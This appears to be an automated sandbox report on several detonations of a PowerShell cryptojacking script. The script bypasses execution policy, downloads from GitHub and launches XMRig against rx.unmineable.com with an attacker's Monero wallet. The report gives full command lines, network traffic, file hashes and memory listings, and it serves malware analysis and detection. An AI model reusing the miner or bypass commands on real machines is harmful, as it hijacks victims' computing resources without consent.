Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 50.192.11.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_23wrggir.f3j.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:45

Platform

win11-20240426-en

Max time kernel

1800s

Max time network

1762s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vojvzmla.3el.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:48

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h5uewoym.45q.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:56

Platform

win11-20240419-en

Max time kernel

1790s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3656-0-0x00007FFE572F3000-0x00007FFE572F5000-memory.dmp

memory/3656-3-0x0000021F65D70000-0x0000021F65D92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bhyd5gp4.zrs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3656-10-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/3656-11-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/3656-12-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/3656-14-0x0000021F66250000-0x0000021F66262000-memory.dmp

memory/3656-15-0x0000021F65FF0000-0x0000021F65FFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3864-46-0x000002ACC0420000-0x000002ACC0440000-memory.dmp

memory/3864-47-0x000002ACC0470000-0x000002ACC0490000-memory.dmp

memory/3864-48-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-50-0x000002ACC1C40000-0x000002ACC1C60000-memory.dmp

memory/3656-51-0x00007FFE572F3000-0x00007FFE572F5000-memory.dmp

memory/3656-49-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/3864-52-0x000002ACC1C60000-0x000002ACC1C80000-memory.dmp

memory/3864-53-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-54-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-55-0x000002ACC1C40000-0x000002ACC1C60000-memory.dmp

memory/3864-57-0x000002ACC1C60000-0x000002ACC1C80000-memory.dmp

memory/3864-56-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-58-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-59-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-60-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-61-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-62-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-63-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-64-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-65-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-66-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-67-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-68-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-69-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-70-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-71-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-72-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-73-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-74-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-75-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-76-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-77-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-78-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-79-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-80-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-81-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-82-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-83-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-84-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-85-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-86-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-87-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-88-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-89-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-90-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-91-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-92-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-93-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-94-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-95-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-96-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-97-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-98-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-99-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-100-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-101-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-102-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-103-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-104-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-105-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-106-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-107-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-108-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-109-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-110-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-111-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-112-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-113-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-114-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-115-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-116-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:06

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

memory/392-0-0x00007FFF77AD3000-0x00007FFF77AD5000-memory.dmp

memory/392-1-0x00000213D49B0000-0x00000213D49D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_idlqqnvd.mec.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/392-11-0x00007FFF77AD0000-0x00007FFF78591000-memory.dmp

memory/392-12-0x00007FFF77AD0000-0x00007FFF78591000-memory.dmp

memory/392-14-0x00007FFF77AD0000-0x00007FFF78591000-memory.dmp

memory/392-15-0x00000213D4A40000-0x00000213D4A52000-memory.dmp

memory/392-16-0x00000213D49A0000-0x00000213D49AA000-memory.dmp

